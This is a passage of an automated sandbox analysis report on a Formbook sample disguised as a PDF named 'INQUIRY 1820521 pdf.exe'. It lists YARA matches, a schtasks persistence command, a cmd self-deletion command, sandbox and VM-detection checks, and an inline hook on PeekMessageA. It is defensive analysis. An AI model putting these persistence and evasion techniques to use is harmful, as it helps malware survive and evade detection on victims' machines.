          Source: INQUIRY 1820521 pdf.exe, 00000007.00000000.675957885.00000000000A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exeBinary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000008.00000000.677042665.00000000001D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exeBinary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000009.00000000.678299200.0000000000942000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000009.00000002.728306510.00000000017BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727314494.0000000001437000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exeBinary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: INQUIRY 1820521 pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: YAhcdYrYHFkNNf.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@17/4@3/3
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeFile created: C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeMutant created: \Sessions\1\BaseNamedObjects\EzfyYQgyGpxJcXHkudBezpt
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp7085.tmpJump to behavior
          Source: INQUIRY 1820521 pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: INQUIRY 1820521 pdf.exeVirustotal: Detection: 39%
          Source: INQUIRY 1820521 pdf.exeMetadefender: Detection: 13%
          Source: INQUIRY 1820521 pdf.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeFile read: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'Jump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: INQUIRY 1820521 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: INQUIRY 1820521 pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727260572.0000000001430000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727260572.0000000001430000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.696903670.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INQUIRY 1820521 pdf.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.696903670.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_00D527CF push 00000052h; iretd 0_2_00D527DF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_00D5269E push ds; iretd 0_2_00D526AC
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 6_2_0039269E push ds; iretd 6_2_003926AC
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 6_2_003927CF push 00000052h; iretd 6_2_003927DF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 7_2_000A269E push ds; iretd 7_2_000A26AC
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 7_2_000A27CF push 00000052h; iretd 7_2_000A27DF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 8_2_001D269E push ds; iretd 8_2_001D26AC
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 8_2_001D27CF push 00000052h; iretd 8_2_001D27DF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0040CBD4 push ds; iretd 9_2_0040CBDF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0041CEB5 push eax; ret 9_2_0041CF08
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0041CF6C push eax; ret 9_2_0041CF72
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0041CF02 push eax; ret 9_2_0041CF08
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0041CF0B push eax; ret 9_2_0041CF72
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0041CFBA push eax; ret 9_2_0041CF72
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0094269E push ds; iretd 9_2_009426AC
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_009427CF push 00000052h; iretd 9_2_009427DF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0158D0D1 push ecx; ret 9_2_0158D0E4
          Source: C:\Windows\explorer.exeCode function: 10_2_04DFE3E6 pushad ; ret 10_2_04DFE3E7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032CD0D1 push ecx; ret 16_2_032CD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A0CBD4 push ds; iretd 16_2_00A0CBDF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A1CEB5 push eax; ret 16_2_00A1CF08
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A1CFBA push eax; ret 16_2_00A1CF72
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A1CF02 push eax; ret 16_2_00A1CF08
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A1CF0B push eax; ret 16_2_00A1CF72
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A1CF6C push eax; ret 16_2_00A1CF72
          Source: initial sampleStatic PE information: section name: .text entropy: 7.49655840913
          Source: initial sampleStatic PE information: section name: .text entropy: 7.49655840913

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeFile created: C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x88 0x8E 0xE3
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: INQUIRY 1820521 pdf.exe PID: 6928, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000A098E4 second address: 0000000000A098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000A09B5E second address: 0000000000A09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00409A90 rdtsc 9_2_00409A90
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe TID: 6932Thread sleep time: -100694s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe TID: 6960Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4200Thread sleep time: -58000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6828Thread sleep time: -55000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeThread delayed: delay time: 100694Jump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 0000000A.00000000.696745704.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000A.00000000.701320132.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
